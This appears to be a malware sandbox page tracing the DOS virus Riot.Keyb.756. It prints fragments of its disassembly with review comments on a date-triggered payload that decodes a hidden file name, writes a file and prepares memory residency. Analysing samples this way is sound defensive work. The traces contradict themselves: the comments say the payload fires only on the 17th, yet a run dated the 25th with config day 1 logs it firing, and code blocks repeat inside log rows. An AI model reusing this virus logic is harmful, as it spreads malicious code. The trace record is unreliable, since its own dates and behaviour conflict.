Sample viewer

vx.netlux.org/Virus.DOS.Riot.Keyb.756

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:57:40.39795787Z 136 PC: 12a54 | UNKNOWN!
2018-12-17T22:57:40.399988433Z 42 PC: 12a61 | Get date 0x12a61: cmp dl, 0x11
; Date-triggered payload. The trace row above ends with `cmp dl, 0x11`, executed
; right after INT 21h/AH=2Ah (Get date), which returns the day of month in DL.
; The fall-through path below therefore runs only on the 17th.
; NOTE(review): bp is loaded outside this window; presumably the sample's own
; base offset for its data. Confirm against the full disassembly.
0x12a64: jne 0x12aa4                       ; day != 0x11 -> skip payload, go to 0x12aa4
0x12a66: mov cx, 0xf                       ; loop count: 15 bytes
0x12a69: lea si, word ptr [bp + 0x386]     ; si -> 15-byte buffer, used as the file name below
0x12a6d: inc byte ptr [si]                 ; add 1 to the byte in place
0x12a6f: inc si
0x12a70: loop 0x12a6d                      ; repeat for all 15 bytes
; NOTE(review): the name is apparently stored with every byte lowered by one,
; so a plain string scan of the file would not show it. Contents not visible here.
0x12a72: mov ah, 0x3c                      ; INT 21h function 3Ch: create or truncate file
0x12a74: xor cx, cx                        ; CX = 0: no file attribute bits
0x12a76: lea dx, word ptr [bp + 0x386]     ; DS:DX -> the buffer modified above (path argument)
0x12a7a: int 0x21                          ; logged in the trace as "Create or truncate file"
0x12a7c: xchg ax, bx                       ; returned handle AX -> BX; no jc follows, so failure is not checked
0x12a7d: mov ah, 0x2c                      ; INT 21h function 2Ch: get time
0x12a7f: int 0x21                          ; returns DL = hundredths of a second
0x12a81: cmp dl, 0x31                      ; clock value picks one of two buffers
0x12a84: jb 0x12a97                        ; DL < 0x31 -> alternative write at 0x12a97
0x12a86: mov ah, 0x40                      ; INT 21h function 40h: write to handle in BX
0x12a88: mov cx, 0x51                      ; 0x51 = 81 bytes, matching "Write 81 bytes" in the trace
0x12a8b: lea dx, word ptr [bp + 0x396]     ; DS:DX -> source buffer (contents not shown on this page)
0x12a8f: int 0x21
2018-12-17T22:57:40.402254023Z 60 PC: 12a7c | Create or truncate file
2018-12-17T22:57:40.750610006Z 44 PC: 12a81 | Get time 0x12a81: cmp dl, 0x31
; Continues from the `cmp dl, 0x31` on the trace row above. DL is the
; hundredths-of-a-second field returned by INT 21h/AH=2Ch (Get time), so the
; choice between the two write buffers depends on the clock.
; BX holds the file handle from the earlier create call (xchg ax, bx at 0x12a7c).
0x12a84: jb 0x12a97                        ; DL < 0x31 -> write the 0x41-byte buffer instead
0x12a86: mov ah, 0x40                      ; INT 21h function 40h: write to handle in BX
0x12a88: mov cx, 0x51                      ; 0x51 = 81 bytes, matching "Write 81 bytes" in the trace
0x12a8b: lea dx, word ptr [bp + 0x396]     ; DS:DX -> first buffer (contents not shown on this page)
0x12a8f: int 0x21
0x12a91: mov ah, 0x3e                      ; INT 21h function 3Eh: close handle in BX
0x12a93: int 0x21
0x12a95: jmp 0x12afe                       ; payload finished; target lies outside the listing
0x12a97: mov ah, 0x40                      ; alternative write, reached when DL < 0x31
0x12a99: mov cx, 0x41                      ; 0x41 = 65 bytes
0x12a9c: lea dx, word ptr [bp + 0x345]     ; DS:DX -> second buffer (contents not shown on this page)
0x12aa0: int 0x21
0x12aa2: jmp 0x12a91                       ; share the close-file tail
; Non-trigger path: target of `jne 0x12aa4` at 0x12a64, taken when the day is not 0x11.
0x12aa4: mov ah, 0x4a                      ; INT 21h function 4Ah: resize memory block (ES set outside this window)
0x12aa6: mov bx, 0xffff                    ; ask for an unsatisfiable size
0x12aa9: int 0x21                          ; DOS fails the call and returns the largest available size in BX
0x12aab: sub bx, 0x31                      ; keep 0x31 paragraphs (784 bytes) back
0x12aae: mov ah, 0x4a                      ; resize again, now to max - 0x31 paragraphs
0x12ab0: int 0x21
; NOTE(review): the trace of the non-trigger run logs two "Reallocate memory"
; calls followed by "Allocate memory" at PC 12ab9. This looks like the usual
; setup for a memory-resident copy. Confirm against the full disassembly.
2018-12-17T22:57:40.754902146Z 64 PC: 12a91 | Write file or device (Write 81 bytes on handle 5)
2018-12-17T22:57:40.758703582Z 62 PC: 12a95 | Close file

{"DateBased":true,"Day":17,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12617,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:35:42.858473779Z 136 PC: 12a54 | UNKNOWN!
2018-12-25T12:35:42.865662391Z 42 PC: 12a61 | Get date 0x12a61: cmp dl, 0x11
; Date-triggered payload. The trace row above ends with `cmp dl, 0x11`, executed
; right after INT 21h/AH=2Ah (Get date), which returns the day of month in DL.
; The fall-through path below therefore runs only on the 17th.
; NOTE(review): bp is loaded outside this window; presumably the sample's own
; base offset for its data. Confirm against the full disassembly.
0x12a64: jne 0x12aa4                       ; day != 0x11 -> skip payload, go to 0x12aa4
0x12a66: mov cx, 0xf                       ; loop count: 15 bytes
0x12a69: lea si, word ptr [bp + 0x386]     ; si -> 15-byte buffer, used as the file name below
0x12a6d: inc byte ptr [si]                 ; add 1 to the byte in place
0x12a6f: inc si
0x12a70: loop 0x12a6d                      ; repeat for all 15 bytes
; NOTE(review): the name is apparently stored with every byte lowered by one,
; so a plain string scan of the file would not show it. Contents not visible here.
0x12a72: mov ah, 0x3c                      ; INT 21h function 3Ch: create or truncate file
0x12a74: xor cx, cx                        ; CX = 0: no file attribute bits
0x12a76: lea dx, word ptr [bp + 0x386]     ; DS:DX -> the buffer modified above (path argument)
0x12a7a: int 0x21                          ; logged in the trace as "Create or truncate file"
0x12a7c: xchg ax, bx                       ; returned handle AX -> BX; no jc follows, so failure is not checked
0x12a7d: mov ah, 0x2c                      ; INT 21h function 2Ch: get time
0x12a7f: int 0x21                          ; returns DL = hundredths of a second
0x12a81: cmp dl, 0x31                      ; clock value picks one of two buffers
0x12a84: jb 0x12a97                        ; DL < 0x31 -> alternative write at 0x12a97
0x12a86: mov ah, 0x40                      ; INT 21h function 40h: write to handle in BX
0x12a88: mov cx, 0x51                      ; 0x51 = 81 bytes, matching "Write 81 bytes" in the trace
0x12a8b: lea dx, word ptr [bp + 0x396]     ; DS:DX -> source buffer (contents not shown on this page)
0x12a8f: int 0x21
2018-12-25T12:35:42.880007509Z 60 PC: 12a7c | Create or truncate file
2018-12-25T12:35:43.248609264Z 44 PC: 12a81 | Get time 0x12a81: cmp dl, 0x31
; Continues from the `cmp dl, 0x31` on the trace row above. DL is the
; hundredths-of-a-second field returned by INT 21h/AH=2Ch (Get time), so the
; choice between the two write buffers depends on the clock.
; BX holds the file handle from the earlier create call (xchg ax, bx at 0x12a7c).
0x12a84: jb 0x12a97                        ; DL < 0x31 -> write the 0x41-byte buffer instead
0x12a86: mov ah, 0x40                      ; INT 21h function 40h: write to handle in BX
0x12a88: mov cx, 0x51                      ; 0x51 = 81 bytes, matching "Write 81 bytes" in the trace
0x12a8b: lea dx, word ptr [bp + 0x396]     ; DS:DX -> first buffer (contents not shown on this page)
0x12a8f: int 0x21
0x12a91: mov ah, 0x3e                      ; INT 21h function 3Eh: close handle in BX
0x12a93: int 0x21
0x12a95: jmp 0x12afe                       ; payload finished; target lies outside the listing
0x12a97: mov ah, 0x40                      ; alternative write, reached when DL < 0x31
0x12a99: mov cx, 0x41                      ; 0x41 = 65 bytes
0x12a9c: lea dx, word ptr [bp + 0x345]     ; DS:DX -> second buffer (contents not shown on this page)
0x12aa0: int 0x21
0x12aa2: jmp 0x12a91                       ; share the close-file tail
; Non-trigger path: target of `jne 0x12aa4` at 0x12a64, taken when the day is not 0x11.
0x12aa4: mov ah, 0x4a                      ; INT 21h function 4Ah: resize memory block (ES set outside this window)
0x12aa6: mov bx, 0xffff                    ; ask for an unsatisfiable size
0x12aa9: int 0x21                          ; DOS fails the call and returns the largest available size in BX
0x12aab: sub bx, 0x31                      ; keep 0x31 paragraphs (784 bytes) back
0x12aae: mov ah, 0x4a                      ; resize again, now to max - 0x31 paragraphs
0x12ab0: int 0x21
; NOTE(review): the trace of the non-trigger run logs two "Reallocate memory"
; calls followed by "Allocate memory" at PC 12ab9. This looks like the usual
; setup for a memory-resident copy. Confirm against the full disassembly.
2018-12-25T12:35:43.252516942Z 64 PC: 12a91 | Write file or device (Write 81 bytes on handle 5)
2018-12-25T12:35:43.257413343Z 62 PC: 12a95 | Close file

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12617,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:35:42.946850531Z 136 PC: 12a54 | UNKNOWN!
2018-12-25T12:35:42.948958538Z 42 PC: 12a61 | Get date 0x12a61: cmp dl, 0x11
; Date check. The trace row above ends with `cmp dl, 0x11`, executed right after
; INT 21h/AH=2Ah (Get date), which returns the day of month in DL. In this run
; the trace continues with "Reallocate memory", so the jne below was taken and
; the file-writing payload that follows it in the listing did not execute.
; NOTE(review): bp is loaded outside this window; presumably the sample's own
; base offset for its data. Confirm against the full disassembly.
0x12a64: jne 0x12aa4                       ; day != 0x11 -> skip payload, go to 0x12aa4
0x12a66: mov cx, 0xf                       ; loop count: 15 bytes
0x12a69: lea si, word ptr [bp + 0x386]     ; si -> 15-byte buffer, used as the file name below
0x12a6d: inc byte ptr [si]                 ; add 1 to the byte in place
0x12a6f: inc si
0x12a70: loop 0x12a6d                      ; repeat for all 15 bytes
0x12a72: mov ah, 0x3c                      ; INT 21h function 3Ch: create or truncate file
0x12a74: xor cx, cx                        ; CX = 0: no file attribute bits
0x12a76: lea dx, word ptr [bp + 0x386]     ; DS:DX -> the buffer modified above (path argument)
0x12a7a: int 0x21
0x12a7c: xchg ax, bx                       ; returned handle AX -> BX; no jc follows, so failure is not checked
0x12a7d: mov ah, 0x2c                      ; INT 21h function 2Ch: get time
0x12a7f: int 0x21                          ; returns DL = hundredths of a second
0x12a81: cmp dl, 0x31                      ; clock value picks one of two buffers
0x12a84: jb 0x12a97                        ; DL < 0x31 -> alternative write at 0x12a97
0x12a86: mov ah, 0x40                      ; INT 21h function 40h: write to handle in BX
0x12a88: mov cx, 0x51                      ; 0x51 = 81 bytes
0x12a8b: lea dx, word ptr [bp + 0x396]     ; DS:DX -> source buffer (contents not shown on this page)
0x12a8f: int 0x21
2018-12-25T12:35:42.951385887Z 74 PC: 12aab | Reallocate memory
2018-12-25T12:35:42.953611011Z 74 PC: 12ab2 | Reallocate memory
2018-12-25T12:35:42.955514978Z 72 PC: 12ab9 | Allocate memory